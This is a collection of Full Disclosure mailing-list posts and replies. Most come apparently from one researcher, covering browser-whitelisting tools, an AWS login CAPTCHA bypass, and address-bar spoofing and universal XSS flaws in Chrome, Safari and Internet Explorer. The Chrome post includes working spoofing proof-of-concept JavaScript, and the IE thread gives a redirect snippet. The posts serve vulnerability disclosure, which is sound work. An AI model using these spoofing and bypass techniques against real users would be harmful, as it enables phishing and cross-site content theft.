[FD] Request For Comment: Possible Flaw of Bypassing CAPTCHA in AWS Login?
The process of AWS login has a feature: if you use "fresh" browser(no cookie, no cache, etc) to sign in, put correct email and correct password there, CAPTCHA is required("To better protect your account, please re-enter your password and then enter the characters as they are shown in the image below"). And I accidentally noticed this feature can be easily bypassed: MY SYSTEM Knoppix 7.6.0 on Read-Only USB Stick - always "fresh" upon booting Chromium 46 - not the latest "US-WEST-2" EC2 Instance as proxy - always the same IP MY STEPS 1. Use Chromium to visit https://console.aws.amazon.com/ 2. Put correct email and correct password there, and sign in 3. CAPTCHA is required 4. Clear cookie cache etc in Chromium 5. Use Chromium under "Lock Browser"(lockbrowser.com) with "txt/https-whitelist.txt" configured as the following: -- amazon.com d3rrzw75sdtfe5.cloudfront.net d3a94n0r6dqtjm.cloudfront.net d2q66yyjeovezo.cloudfront.net d3rn69q7afuxu6.cloudfront.net d257l1zb7u5fh9.cloudfront.net -- 6. Visit https://console.aws.amazon.com/ ... it should be an ugly page because CSS etc fails to load. 7. Put correct email and correct password there, and sign in 8. CAPTCHA is NOT required ABOUT I noticed this weird thing because I'm super lazy - don't add domains to whitelist if it works. Later, I thought, "oops, CAPTCHA is gone". Of course, I contacted Amazon, and they said it's not a bug. REQUEST FOR COMMENT 1. Can you reproduce this? 2. Is this thing a bug or not? Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lock Browser 5.3 (Browser Security, Open Source, Python)
SUMMARY This open source tool strictly controls what web browser can access, which stops web browser from loading harmful content - Phishing, Non-Secure HTTP, or whatever that's not in your whitelist. SITUATION "Security flaws in Google Chrome, Microsoft Edge, and Apple Safari were all successfully exploited... browsers as well as Windows, OS X, and Flash" http://venturebeat.com/2016/03/18/pwn2own-2016-chrome-edge-and-safari-hacked-460k-awarded-in-total/ ATTACK Attacks have to make target's browser load attacker's website, which has two scenarios - send the link(phishing), or control a website that target will visit. The latter is difficult because web servers are usually(not always) much more secure than web browsers, and attackers simply don't know which websites. The former, Phishing, is "mainstream", because it's a lot easier: the address of email sender can be faked, the content of email can look 100% legitimate and compelling, and the URL can hide behind redirection service("dereferer" of email system, t.co, or whatever). SOLUTION Whitelist - for example, the whitelist contains Gmail, PayPal, Chase, GitHub, and Twitter. Attacker's website is not in the whitelist, so the harmful content does not reach browser, even if some users are "stupid enough" to click links from The Phishing Guy. URLs Project Home Page: https://www.lockbrowser.com/ Source Code: https://www.lockbrowser.com/source/ HISTORY It's fork of HTTPS Only released in March: http://seclists.org/fulldisclosure/2016/Mar/77 And this is likely the last version - because the source code is so short and simple, maybe there is really no bug here! Let me hope so. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)
To secure browser which is very fragile, the approach of HTTPS Only 3.1 is exceptionally simple: 1. Only HTTPS URLs(no other protocols) 2. Whitelist of domains(anything outside of whitelist is blocked) Now, let's look at threats: 1. Man in the middle - it's fixed. 2. Phishing always requires the browser to load attacker's website, so it's permanently dead here. 3. Drive-by Download - dead(if applied strictly, unable to download the executable) 4. Clickjacking - dead(attacker's web page is unreachable) 5. Address Spoofing - dead too(just unable to load the fake content) 6. XSS - almost dead(for attacker, the XSS vulnerability has to be GET, because POST requires attacker's HTML) 7. CSRF - almost dead(for attacker, the CSRF vulnerability has to be GET, and modern web applications simply don't do important things in GET, because it can be bookmarked etc, too dangerous) URLs: Project Home Page: https://www.httpsonly.net/ View Source Code: https://www.httpsonly.net/source/ Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)
When we browse the web, top threats are: 1. Remote code execution - everything is lost 2. Man in the middle - sniffing, and tampering 3. Phishing - simple, old, and still quite useful 4. Cross site scripting - data of the vulnerable domain is lost 5. CSRF - unauthorized action So, what if the browser can only access HTTPS of whitelist domains? With HTTPS, "man in the middle" is fixed. And with the whitelist, other attacks become very difficult, some even become impossible(such as phishing). Phishing is a huge headache in this era, because URLs can be hidden in legitimate redirection(such as t.co). That's why we made this simple tool(really simple - less than 200 lines of Python and JavaScript): Project Home Page - https://www.httpsonly.net/ Source Code - https://github.com/httpsonly/httpsonly Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)
(@moderators The original post was too brief. This one has details.) Summary This tool completely locks browser - just HTTPS, nothing else. This tool is extremely simple - less than 100 lines of code(Python and JavaScript). Why Firefox Add-on Firesheep Brings Hacking to the Masses http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html "Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic" (Quite a while ago, it's become a "casual game") Yes, Mozilla said, "Gradually phasing out access to browser features for non-secure websites", in April 2015. After more than six months, they have done nothing useful. The Chrome team wanted the same stuff: https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure Again, nothing significant has been achieved yet. And there is HTTPS Everywhere, with SO MANY rules: https://www.eff.org/https-everywhere/atlas/ It's still able to access HTTP by default, but there is "Block all HTTP requests". The problem: nothing happens when browser tries HTTP - there should be warning(it's incorrect behavior) and options(try HTTPS, Google Cache, etc). People complained, months ago: https://github.com/EFForg/https-everywhere/issues/1329 How PAC(Proxy auto-config) is used: If it's HTTPS, that's fine. If it's HTTP, user gets warning and options(try HTTPS, Google Cache - it has HTTPS, etc). Anything else, it goes to 0.0.0.0 It's a simple tool that does one job, and does it very well. URLs https://httpsonly.github.io/ https://github.com/httpsonly/httpsonly Best Wishes, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open source tool for applying Google Chrome security updates
The Problem If you are a network administrator, keeping browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China(no Google services), updating Chrome is not an easy task. The Solution The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether visitor's Chrome is exactly the same. Security The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript. URLs Source Code https://github.com/windowschrome Home Page http://www.windowschrome.com/ Latest Stable Chrome http://www.windowschrome.com/data/version.txt ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing - Google's Opinion
It's public now: https://code.google.com/p/chromium/issues/detail?id=497588 Interesting Points: They did reproduce "I can reproduce this locally" They say it's DoS "seems like any renderer denial-of-service" (The browser does not crash!) They say it's not security issue "remove security flags from this bug" Finally, they stopped replying "Jun 10" to "Jul 2" (unbelievable huge delay) In the end, they get it "Lots of phishing attacks these days tell you to call a phone number" "No interactions" Currently, it's "Severity-Medium". Kind Regards, PS http://dieyu.org/ Updated! ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
http://seclists.org/fulldisclosure/2015/Jun/109 Big Whale said: "Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works" "clearly URL spoofing" Thanks for testing! http://seclists.org/oss-sec/2015/q3/0 0pc0deFR said: "Work on Google Chrome Ubuntu" Bonjour, thanks for testing! http://seclists.org/oss-sec/2015/q2/824 Daniel Micay said: "It does display a window with the oracle.com address" "why you've got an ever increasing number of setTimeout events" http://seclists.org/oss-sec/2015/q2/823 Alexander E. Patrakov said: "Looks like a fork bomb" Thanks for testing! The number of "setTimeout" does NOT need to be increasing forever. OK, I admit - we are lazy(it works and we don't touch it anymore) :-) http://seclists.org/oss-sec/2015/q3/2 Roney Gomes said: "it worked on the desktop version of Opera" Wow! Thanks for letting us know. Here is the screenshot of Opera http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png And Chrome http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png (A number is displayed in Chrome's address bar, not the same as Opera) http://seclists.org/oss-sec/2015/q2/826 Daniel Micay said: "it can't always be replicated" "I've tried it a few times and" "it fails about as often as it works" http://seclists.org/oss-sec/2015/q3/4 Valentinas Bakaitis said: "PoC did not work" Hey! The trick here is timing: Please modify those numbers in code - make them smaller. http://seclists.org/oss-sec/2015/q3/5 Zak Siddiqui said: "Is it reproducible with HTTPS?" Yes, we just tried this URL https://en.wikipedia.org/wiki/Main_Page It works. In fact, it works BETTER against HTTPS, because HTTPS is slower, so timing is easier. http://seclists.org/oss-sec/2015/q2/825 Florian Weimer said: "they show the new URL while still displaying old content" Exactly, that's the cause of this bug. In the end, allow me to repeat: No user interaction on the fake page. But, anyone can do "BBB Accredited Business" "PayPal Partner" etc. Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ On 2015/6/30 7:08, David Leo wrote: Impact: The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc. You can make whitehouse.gov display "We love Islamic State" :-) Note: No user interaction on the fake page. Code: * index.html function next() { w.location.replace('<a rel="nofollow" href="http://www.oracle.com/index.html">http://www.oracle.com/index.html</a>?'+n);n++; setTimeout("next();",15); setTimeout("next();",25); } function f() { w=window.open("content.html","_blank","width=500 height=500"); i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); } Go * content.html This web page is NOT oracle.com location="<a rel="nofollow" href="http://www.oracle.com/index.html"">http://www.oracle.com/index.html"</a>;; * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says "June/16/2015" - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact: The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc. You can make whitehouse.gov display "We love Islamic State" :-) Note: No user interaction on the fake page. Code: * index.html function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout("next();",15); setTimeout("next();",25); } function f() { w=window.open("content.html","_blank","width=500 height=500"); i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); } Go * content.html This web page is NOT oracle.com location="http://www.oracle.com/index.html";; * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says "June/16/2015" - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Safari Address Spoofing (How We Got It)
Great blog, Michal! If you change "http://1.2.3.4/"; in your Safari code: some URL in the real world(for example, dailymail.co.uk). Your code won't work(page of target domain is simply loaded). The trick here is: "keep trying to load". Kind Regards, __ BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. On 2015/5/31 23:09, Michal Zalewski wrote: Well... http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html On Thu, May 28, 2015 at 10:47 PM, David Leo wrote: Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Safari Address Spoofing (How We Got It)
Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
'could you share the contents of "1.php"?' Sure: http://www.dailymail.co.uk/robots.txt";); ?> "I'm assuming it is a delayed re-direct to the target's domain?" Exactly. :-) "the cloudflare scripts" It's been tested without them. Kind Regards, On 2015/2/6 2:31, Barkley, Peter wrote: Thanks Zaakiy, I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page. David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts. Thanks, Peter Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada -Original Message- From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Zaakiy Siddiqui Sent: 2015, February, 04 6:46 PM To: David Leo; Joey Fowler Cc: fulldisclosure@seclists.org; b...@securitytracker.com; bugt...@securityfocus.com; cve-ass...@mitre.org Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched Hi David, Nice one…great find! And thanks Joey for confirming the bypass of HTTP-to-HTTPS restrictions. I can confirm that this also affects Spartan Browser (Experimental enabled in about:flags in Internet Explorer 11). I can also confirm that IE 10 is affected. IE 9 appears to not be vulnerable. Screenshots below. Regards, Zaakiy Siddiqui IE 11 Spartan - vulnerable (Windows 10) [cid:Image1466.png@14b56f08dd75bb] [cid:Image1487.png@14b56f6487b5d0] IE 10 - vulnerable (Windows 7) [cid:Image1485.jpg@14b56f5f5025ce] IE 9 - not vulnerable (Windows 7) [cid:Image1503.jpg@14b56fa3c785e0] From: David Leo<mailto:david@deusen.co.uk> Sent: Wednesday, 4 February 2015 11:13 PM To: Joey Fowler<mailto:j...@tumblr.com> Cc: bugt...@securityfocus.com<mailto:bugt...@securityfocus.com>, fulldisclosure@seclists.org<mailto:fulldisclosure@seclists.org>, b...@securitytracker.com<mailto:b...@securitytracker.com>, cve-ass...@mitre.org<mailto:cve-ass...@mitre.org> Microsoft was notified on Oct 13, 2014. Joey thank you very much for your words. Kind Regards, On 2015/2/3 4:53, Joey Fowler wrote: Hi David, "nice" is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is). It looks like, through this method, all viable XSS tactics are open! Nice find! Has this been reported to Microsoft outside (or within) this thread? -- Joey Fowler Senior Security Engineer, Tumblr On Sat, Jan 31, 2015 at 9:18 AM, David Leo mailto:david@deusen.co.uk>> wrote: Deusen just published code and description here: http://www.deusen.co.uk/items/__insider3show.3362009741042107/ <http://www.deusen.co.uk/items/insider3show.3362009741042107/> which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk <http://dailymail.co.uk> can be changed by external domain. How To Use 1. Close the popup window("confirm" dialog) after three seconds. 2. Click "Go". 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk <http://dailymail.co.uk>. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply "nice". Kind Regards, _ Sent through the Full Disclosure mailing list https://nmap.org/mailman/__listinfo/fulldisclosure <https://nmap.org/mailman/listinfo/fulldisclosure> Web Archives & RSS: http://seclists.org/__fulldisclosure/ <http://seclists.org/fulldisclosure/> ___ If you received this email in error, please advise the sender (by return email or otherwise) immediately. You have consented to receive the attached electronically at the above-noted email address; please
[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"
1. "Spartan - vulnerable (Windows 10)" http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png Thanks to Zaakiy Siddiqui! 2. http://www.dailymail.co.uk/robots.txt";); ?> Many asked for it. 3. It's Universal XSS, as we tested: Not only dailymail.co.uk - also Yahoo etc Not only injecting content - also getting private info etc. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
"is this entirely an IE flaw" Yes. "is it tied to the use of Cloudflare" No. "I tried to reproduce... was unsuccessful" Likely, this detail is missing: http://www.dailymail.co.uk/robots.txt";); ?> Please tell us whether you reproduce(with the PHP code). "am I correct... JavaScript hosted on shared domains" In the demo, it's first injected into page without any JavaScript. (robots.txt) "I don't have time to to a teardown on CloudFlare.JS" Honestly we don't even know such file exists :-) We uploaded and took a screenshot - that's all. "it's a very impressive exploit" Thanks. 'make sure the label "universal" is actually justified' It has also been tested against Yahoo etc. "Sorry if this has already been discussed elsewhere" Many asked - for example: http://www.milw00rm.com/exploits/7057 Again, please tell us whether you reproduce with the PHP code. Kind Regards, On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote: So here's a possibly stupid question: is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site? I ask because: 1 - I tried to reproduce the attack in a number of ways without using CloudFlare, and was unsuccessful. 2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The injection attempt failed. 3 - I then used Burp in the same way, but replaced "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use CloudFlare, and the injection attempt succeeded. If this is true, am I correct in thinking that while this definitely involves a vulnerability in IE, it also depends at least on targeting website owners who use JavaScript hosted on shared domains (CloudFlare, in this case), which is inherently riskier than hosting it all on one's own domain due to the way cross-domain security works in modern browsers? I don't have time to to a teardown on CloudFlare.JS, but does this also depend on some sort of code vulnerability in that file? Even if one or both of those caveats are true, it's a very impressive exploit, but I'd like to make sure the label "universal" is actually justified. Sorry if this has already been discussed elsewhere. I couldn't find anything when I looked. - Ben On 2015-02-02 12:53, Joey Fowler wrote: Hi David, "nice" is an understatement here. I've done some testing with this one and, while there *are* quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is). It looks like, through this method, all viable XSS tactics are open! Nice find! Has this been reported to Microsoft outside (or within) this thread? -- Joey Fowler Senior Security Engineer, Tumblr On Sat, Jan 31, 2015 at 9:18 AM, David Leo wrote: Deusen just published code and description here: http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window("confirm" dialog) after three seconds. 2. Click "Go". 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply "nice". Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
Microsoft was notified on Oct 13, 2014. Joey thank you very much for your words. Kind Regards, On 2015/2/3 4:53, Joey Fowler wrote: Hi David, "nice" is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is). It looks like, through this method, all viable XSS tactics are open! Nice find! Has this been reported to Microsoft outside (or within) this thread? -- Joey Fowler Senior Security Engineer, Tumblr On Sat, Jan 31, 2015 at 9:18 AM, David Leo mailto:david@deusen.co.uk>> wrote: Deusen just published code and description here: http://www.deusen.co.uk/items/__insider3show.3362009741042107/ <http://www.deusen.co.uk/items/insider3show.3362009741042107/> which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk <http://dailymail.co.uk> can be changed by external domain. How To Use 1. Close the popup window("confirm" dialog) after three seconds. 2. Click "Go". 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk <http://dailymail.co.uk>. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply "nice". Kind Regards, _ Sent through the Full Disclosure mailing list https://nmap.org/mailman/__listinfo/fulldisclosure <https://nmap.org/mailman/listinfo/fulldisclosure> Web Archives & RSS: http://seclists.org/__fulldisclosure/ <http://seclists.org/fulldisclosure/> ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here: http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window("confirm" dialog) after three seconds. 2. Click "Go". 3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply "nice". Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/